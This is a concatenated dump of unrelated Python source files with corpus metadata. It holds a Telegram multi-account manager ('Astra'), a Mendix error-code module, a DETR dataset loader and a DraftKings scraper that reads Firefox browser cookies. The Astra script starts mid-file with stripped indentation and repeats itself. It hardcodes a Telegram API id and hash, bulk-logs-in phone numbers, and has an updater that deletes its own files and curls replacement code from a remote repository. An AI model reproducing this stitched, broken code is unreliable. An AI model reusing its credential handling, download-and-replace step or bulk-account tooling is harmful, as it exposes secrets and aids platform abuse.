for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| en | 0.605556 | # fancy logo #print('=============SON OF GENISYS==============') #client.sign_in(phone, input('[+] Enter the code: ')) # thanks to github.com/th3unkn0n for the snippet below # https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt #os.system('del scraper.py') | 2.192449 | 2 |
src/m2ee/client_errno.py | rus-kh/m2ee-tools | 23 | 9157 | <reponame>rus-kh/m2ee-tools<filename>src/m2ee/client_errno.py
#
# Copyright (C) 2009 Mendix. All rights reserved.
#
SUCCESS = 0
# Starting the Mendix Runtime can fail in both a temporary or permanent way.
# Some of the errors can be fixed with some help of the user.
#
# The default m2ee cli program will only handle a few of these cases, by
# providing additional hints or interactive choices to fix the situation and
# will default to echoing back the error message received from the runtime.
# Database to be used does not exist
start_NO_EXISTING_DB = 2
# Database structure is out of sync with the application domain model, DDL
# commands need to be run to synchronize the database.
start_INVALID_DB_STRUCTURE = 3
# Constant definitions used in the application model are missing from the
# configuration.
start_MISSING_MF_CONSTANT = 4
# In the application database, a user account was detected which has the
# administrative role (as specified in the modeler) and has password '1'.
start_ADMIN_1 = 5
# ...
start_INVALID_STATE = 6
start_MISSING_DTAP = 7
start_MISSING_BASEPATH = 8
start_MISSING_RUNTIMEPATH = 9
start_INVALID_LICENSE = 10
start_SECURITY_DISABLED = 11
start_STARTUP_ACTION_FAILED = 12
start_NO_MOBILE_IN_LICENSE = 13
check_health_INVALID_STATE = 2
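
# --- Illustrative sketch (not part of the original module) ---
# One way a caller might translate the start_* codes above into hints for the
# user; the messages are paraphrases of the comments, not official m2ee text.
_START_ERROR_HINTS = {
    start_NO_EXISTING_DB: "the configured database does not exist",
    start_INVALID_DB_STRUCTURE: "database structure is out of sync; run the DDL commands",
    start_MISSING_MF_CONSTANT: "constant definitions are missing from the configuration",
    start_ADMIN_1: "a user with the administrative role still has password '1'",
}

def describe_start_error(code):
    return _START_ERROR_HINTS.get(code, "unknown start error %s" % code)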
| #
datasets/__init__.py | andrewliao11/detr | 0 | 9158 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
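
# --- Illustrative usage sketch (not part of the original module) ---
# build_dataset() only needs an object with a .name attribute plus whatever the
# chosen builder reads; SimpleNamespace stands in for the real argparse config,
# and the coco_path default below is a made-up path.
def _example_build(coco_path='/data/coco'):
    from types import SimpleNamespace
    dataset_args = SimpleNamespace(name='mscoco17', coco_path=coco_path)
    train_set = build_dataset('train', dataset_args)
    return get_class_mapping(train_set)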
| # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
| en | 0.502991 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved # if isinstance(dataset, torchvision.datasets.CocoDetection): # break # if isinstance(dataset, torchvision.datasets.CocoDetection): # break #elif dataset_args.name == 'viper': # from .viper import build as build_viper # return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping) | 2.253178 | 2 |
dkhomeleague/dkhomeleague.py | sansbacon/dkhomeleague | 0 | 9159 | # dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
from pathlib import Path
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
return r.content()
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
def _to_obj(self, pth):
"""Reads json text in pth and creates python object"""
if isinstance(pth, str):
pth = Path(pth)
return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
        # TODO: this may be the same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
    Sheet is set up with the week in column A and one column per league user
    (column B onward); each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
            ws = pdsheet.get_worksheet(self.app, self.sskey)
            s = ws.get_sheet_by_id(self.sheet_id)
            rng = s.get_data_range()
            headers = rng.get_values()[0]
            # start=1 gives 1-based column numbers (A=1), matching the docstring
            self._colmap = {user: idx for idx, user in enumerate(headers, start=1)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
        # get the sheet
        ws = pdsheet.get_worksheet(self.app, self.sskey)
        s = ws.get_sheet_by_id(self.sheet_id)
        # figure out the last row
        rng = s.get_data_range()
        newrow_index = rng.coordinates.number_of_row + 1
        # write the week number into column A, per the class docstring
        s.get_range(newrow_index, 1, 1, 1).set_value(week)
        # now loop through the results and add each user's score to their column
        colmap = self.column_map
        for k, v in results.items():
            colnum = colmap.get(k)
            if colnum:
                cell = s.get_range(newrow_index, colnum, 1, 1)
                cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
        ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
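    # Illustrative usage sketch added by the editor (not part of the original
    # file). It assumes DK_LEAGUE_KEY, DK_USERNAME and DK_LEAGUE_SPREADSHEET
    # are set in the environment and that DraftKings cookies exist in Firefox.
    scraper = Scraper()
    parser = Parser()
    upcoming = parser.upcoming_contests(scraper.upcoming_contests())
    print(upcoming)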
| # dkhomeleague.py
import json
import logging
import os
from string import ascii_uppercase
import pandas as pd
from requests_html import HTMLSession
import browser_cookie3
import pdsheet
class Scraper:
"""scrapes league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Scraper
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
self.s = HTMLSession()
self.s.headers.update({
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
'DNT': '1',
'Accept': '*/*',
'Origin': 'https://www.draftkings.com',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'https://www.draftkings.com/',
'Accept-Language': 'en-US,en;q=0.9,ar;q=0.8',
})
self.cj = browser_cookie3.firefox()
@property
def api_url(self):
return 'https://api.draftkings.com/'
@property
def base_params(self):
return {'format': 'json'}
def _embed_params(self, embed_type):
return dict(**self.base_params, **{'embed': embed_type})
def contest_leaderboard(self, contest_id):
"""Gets contest leaderboard"""
url = self.api_url + f'scores/v1/megacontests/{contest_id}/leaderboard'
params = self._embed_params('leaderboard')
return self.get_json(url, params=params)
def contest_lineup(self, draftgroup_id, entry_key):
"""Gets contest lineup
Args:
draftgroup_id (int): the draftgroupId
entry_key (int): the id for the user's entry into the contest
can find entryKey in the leaderboard resource
Returns:
dict
"""
url = self.api_url + f'scores/v2/entries/{draftgroup_id}/{entry_key}'
params = self._embed_params('roster')
return self.get_json(url, params=params)
def get_json(self, url, params, headers=None, response_object=False):
"""Gets json resource"""
headers = headers if headers else {}
r = self.s.get(url, params=params, headers=headers, cookies=self.cj)
if response_object:
return r
try:
return r.json()
except:
            return r.content  # `content` is a bytes property, not a callable
def historical_contests(self, limit=50, offset=0):
"""Gets historical contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}/historical'
extra_params = {'limit': limit, 'offset': offset}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def historical_contests_user(self):
"""Gets user historical results"""
url = self.api_url + f'scores/v1/entries/user/{self.username}/historical'
extra_params = {'contestSetKey': self.league_key, 'contestSetType': 'league'}
params = dict(**self.base_params, **extra_params)
return self.get_json(url, params=params)
def live_contests(self):
pass
#url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
#params = self.base_params
#return self.get_json(url, params=params)
def league_metadata(self):
"""Gets league metadata"""
url = self.api_url + f'leagues/v2/leagues/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
def upcoming_contests(self):
"""Gets upcoming contests"""
url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}'
params = self.base_params
return self.get_json(url, params=params)
class Parser:
"""Parses league results"""
def __init__(self, league_key=None, username=None):
"""Creates instance
Args:
league_key (str): id for home league
username (str): your username
Returns:
Parser
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self.league_key = league_key if league_key else os.getenv('DK_LEAGUE_KEY')
self.username = username if username else os.getenv('DK_USERNAME')
def _to_dataframe(self, container):
"""Converts container to dataframe"""
return pd.DataFrame(container)
    def _to_obj(self, pth):
        """Reads json text in pth and creates python object"""
        from pathlib import Path  # local import: Path is not imported at module level
        if isinstance(pth, str):
            pth = Path(pth)
        return json.loads(pth.read_text())
def contest_entry(self, data):
"""Parses contest entry
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'lineupId', 'userName',
'userKey', 'timeRemaining', 'rank', 'fantasyPoints']
player_wanted = ['displayName', 'rosterPosition', 'percentDrafted', 'draftableId', 'score',
'statsDescription', 'timeRemaining']
entry = data['entries'][0]
d = {k: entry[k] for k in wanted}
d['players'] = []
for player in entry['roster']['scorecards']:
d['players'].append({k: player[k] for k in player_wanted})
return d
def contest_leaderboard(self, data):
"""Parses contest leaderboard
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['userName', 'userKey', 'draftGroupId', 'contestKey', 'entryKey', 'rank', 'fantasyPoints']
return [{k: item.get(k) for k in wanted} for item in data['leaderBoard']]
def historical_contests(self, data):
"""Parses historical league contests
Args:
data (dict): parsed JSON
Returns:
list: of contest dict
"""
vals = []
wanted = ['contestStartTime', 'gameSetKey', 'contestKey', 'name', 'draftGroupId',
'entries', 'maximumEntries', 'maximumEntriesPerUser', 'entryFee', 'contestState']
for contest in data['contests']:
d = {k: contest[k] for k in wanted}
attrs = contest['attributes']
if attrs.get('Root Recurring Contest ID'):
d['recurringContestId'] = attrs.get('Root Recurring Contest ID')
vals.append(d)
return vals
def historical_contests_user(self, data):
"""Parses historical contests for user in league
Args:
data (dict): parsed JSON
Returns:
list: of dict
"""
wanted = ['draftGroupId', 'contestKey', 'entryKey', 'userName', 'userKey', 'rank', 'fantasyPoints',
'fantasyPointsOpponent', 'userNameOpponent']
return [{k: item[k] for k in wanted} for item in data['entries']]
def league_members(self, data):
"""Gets league members
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
list: of str
"""
return [item['username'] for item in data['league']['members']]
def league_metadata(self, data):
"""Gets league metadata
Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8
Args:
data (dict): parsed JSON
Returns:
dict: with user details
"""
d = {}
league = data['league']
d['league_name'] = league['name']
d['league_key'] = league['key']
d['league_commissioner'] = league['creatorUsername']
d['members'] = {item['username']: item['userKey'] for item in league['members']}
return d
def live_contests(self, data):
        # TODO: this may be the same as upcoming_contests, then filter on contestState
pass
def upcoming_contests(self, data):
contests = data['contests']
wanted = ['name', 'contestKey', 'draftGroupId', 'entries', 'contestStartTime', 'contestState']
return [{k: contest[k] for k in wanted} for contest in contests]
class Tracker:
"""Track league results with Google Sheets
Sheet is set up with week as Column A, League Users as Column B -
Each row is a weekly result starting with the week number
"""
def __init__(self, sskey=None, json_secret_fn=None, sheet_id=0):
"""Creates instance
Args:
sskey (str): key for worksheet
json_secret_fn (str): fn with authentication secrets
sheet_id (int): id for individual sheet
Returns:
Tracker
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
self._colmap = None
self.app = pdsheet.get_app(json_secret_fn)
self.sskey = sskey if sskey else os.getenv('DK_LEAGUE_SPREADSHEET')
self.sheet_id = sheet_id
@property
def column_map(self):
"""Gets map of league members -> column number (A=1, etc.)"""
if not self._colmap:
            ws = pdsheet.get_worksheet(self.app, self.sskey)
            s = ws.get_sheet_by_id(self.sheet_id)
            rng = s.get_data_range()
            headers = rng.get_values()[0]
            # start=1 gives 1-based column numbers (A=1), matching the docstring
            self._colmap = {user: idx for idx, user in enumerate(headers, start=1)}
return self._colmap
def add_week_results(self, week, results):
"""Adds week results to sheet
Args:
week (int): the week
results (dict): key is username, value is score
"""
        # get the sheet
        ws = pdsheet.get_worksheet(self.app, self.sskey)
        s = ws.get_sheet_by_id(self.sheet_id)
        # figure out the last row
        rng = s.get_data_range()
        newrow_index = rng.coordinates.number_of_row + 1
        # write the week number into column A, per the class docstring
        s.get_range(newrow_index, 1, 1, 1).set_value(week)
        # now loop through the results and add each user's score to their column
        colmap = self.column_map
        for k, v in results.items():
            colnum = colmap.get(k)
            if colnum:
                cell = s.get_range(newrow_index, colnum, 1, 1)
                cell.set_value(v)
def get_week_results(self, week):
"""Gets week results from sheet
Args:
week (int): the week of results
"""
        ws = pdsheet.get_worksheet(self.app, self.sskey)
s = ws.get_sheet_by_id(self.sheet_id)
rng = s.get_data_range()
rows = rng.get_values()
headers = rows.pop(0)
for row in rows:
if row[0] == week:
return dict(zip(headers, row))
return None
def summary(self):
"""Creates summary table of results"""
pass
if __name__ == '__main__':
pass
| en | 0.703664 | # dkhomeleague.py scrapes league results Creates instance Args: league_key (str): id for home league username (str): your username Returns: Scraper Gets contest leaderboard Gets contest lineup Args: draftgroup_id (int): the draftgroupId entry_key (int): the id for the user's entry into the contest can find entryKey in the leaderboard resource Returns: dict Gets json resource Gets historical contests Gets user historical results #url = self.api_url + f'contests/v1/contestsets/league/{self.league_key}' #params = self.base_params #return self.get_json(url, params=params) Gets league metadata Gets upcoming contests Parses league results Creates instance Args: league_key (str): id for home league username (str): your username Returns: Parser Converts container to dataframe Reads json text in pth and creates python object Parses contest entry Args: data (dict): parsed JSON Returns: list: of dict Parses contest leaderboard Args: data (dict): parsed JSON Returns: list: of dict Parses historical league contests Args: data (dict): parsed JSON Returns: list: of contest dict Parses historical contests for user in league Args: data (dict): parsed JSON Returns: list: of dict Gets league members Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8 Args: data (dict): parsed JSON Returns: list: of str Gets league metadata Example URL: https://api.draftkings.com/leagues/v2/leagues/67ymkfy8 Args: data (dict): parsed JSON Returns: dict: with user details # TODO: this may same as upcoming_contests, then filter on contestState Track league results with Google Sheets Sheet is set up with week as Column A, League Users as Column B - Each row is a weekly result starting with the week number Creates instance Args: sskey (str): key for worksheet json_secret_fn (str): fn with authentication secrets sheet_id (int): id for individual sheet Returns: Tracker Gets map of league members -> column number (A=1, etc.) Adds week results to sheet Args: week (int): the week 